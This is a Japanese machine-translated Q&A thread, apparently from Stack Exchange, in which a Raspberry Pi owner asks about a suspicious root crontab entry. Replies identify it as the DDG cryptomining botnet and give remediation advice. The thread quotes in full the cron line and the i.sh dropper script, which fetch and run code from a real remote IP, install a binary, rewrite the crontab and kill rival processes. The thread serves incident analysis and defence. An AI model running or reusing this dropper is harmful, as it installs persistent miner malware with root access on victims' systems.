15分ごとに「xribfa4」を実行する疑わしいcrontabエントリ

Raspberry Piのルートcrontabファイルに何かを追加したかったのですが、Googleでその一部を検索しても疑わしいエントリが見つかりませんでした。

crontabエントリ：

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

内容は次のhttp://103.219.112.66:8000/i.shとおりです。

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Linuxの知識は限られていますが、インドネシアのサーバーからバイナリをダウンロードしてrootとして定期的に実行するのは普通のことではないようです。

これは何ですか？私は何をすべきか？

security cron malware

— ピーター・ダム
ソース

円形です。15分ごとに、自身の新しいコピーをダウンロードしてインストールします。リモートサーバー上のコピーが変更された場合、このcronjobを実行しているすべてのサーバーは、15分以内に新しいコードが実行されます。

— ワイルドカード

ラズベリーパイはインターネットに公開されていますか？あなたのラズベリーパイは何を実行していますか？これは、xribfa4を検索したときのGoogleでの唯一の結果です。これを行う必要があるソフトウェアを実行していない場合、これはおそらくウイルスです。

— kemotep

@kemotepの文字列はランダムですが、IPを検索するといくつかの結果が得られます。ddgマイニングボットネットに関する何か

— frostschutz

見つけた。IPがインドネシア政府のサイトに登録されているのはおかしい。また、このペイロードを配信する他のIPがほぼ2000個あるようです。

— ケモテプ

主な注意点は、crontabエントリを削除しても、システムに感染を許す脆弱性が残っている可能性が高いことです。その脆弱性を見つけて修正する必要があります。

— ハンスマーティンモスナー

回答:

これはDDGマイニングボットネットであり、動作方法は次のとおりです。

RCE脆弱性の悪用
crontabを変更する
適切なマイニングプログラムのダウンロード（goで記述）
マイニングプロセスの開始

DDG：データベースサーバーを対象としたマイニングボットネット

ボットネットが別のボットネットのインフラストラクチャを借りるときのSystemdMiner

U＆L：AWS EC2インスタンスでマイナーマルウェアを殺すにはどうすればよいですか？（侵害されたサーバー）

— GAD3R
ソース

ええ、実際にはこれがそうです。ありがとう！何も新しいものが出なければ、これを答えとしてマークします。

— ピーターダム

ルート化されたマシンに関する通常のアドバイスを忘れないでください。穴を修正できるように、それらがどのように侵入したかを試してみてください。これから学び、セキュリティを強化してください。最後に、マシンを破棄して再インストールします。

— マルセルム

良いニュースは、i686とx86_64のためだけに、Piのマイナーがいないように見えることです。

— マーク

@Markその良いニュースはどうですか？誰かが未知のエントリポイントを使用してPiを完全に制御し、Piのすべての秘密（パスワードを含むがこれに限定されない）に完全にアクセスできました。鉱夫が走るかどうかは本当に「小さな不便」の領域にあります。

— マルセルム

@marcelm、攻撃者はそれを完全に制御し、ほとんど確実にその制御で重要なことをしませんでした。

— マーク・

実際に必要なTCPポートとUDPポートを特定し、ルーターのファイアウォールの他のすべてのポートをブロックします。おそらく、これらのcrontabエントリは再表示されません。

Shields Up！を使用して、どのポートが開いていて公開されているかを確認できます。grc.comの機能。

— マイク・ウォーターズ
ソース

または、彼は脆弱性にパッチを当てることができます。

— ハーパー-モニカの復活

@ハーパー絶対に！それは当然です。おそらく、未使用のポートを最初にブロックせずに、パッチを適用しようとしていたときに再感染する可能性があると考えていました。

— マイクウォーターズ

security.SEからの関連コメント：security.stackexchange.com/questions/147770/...

— ワイルドカード

これ（ただし、TCPとUDPだけに限定されません）、常に。別名ポジティブセキュリティモデル、ホワイトリスト、またはデフォルトで拒否—明示的に使用または必要としないすべてのトラフィックを拒否します。これは、すべてのホールが侵入にさらされないようにする唯一の方法です。

— アンチクリス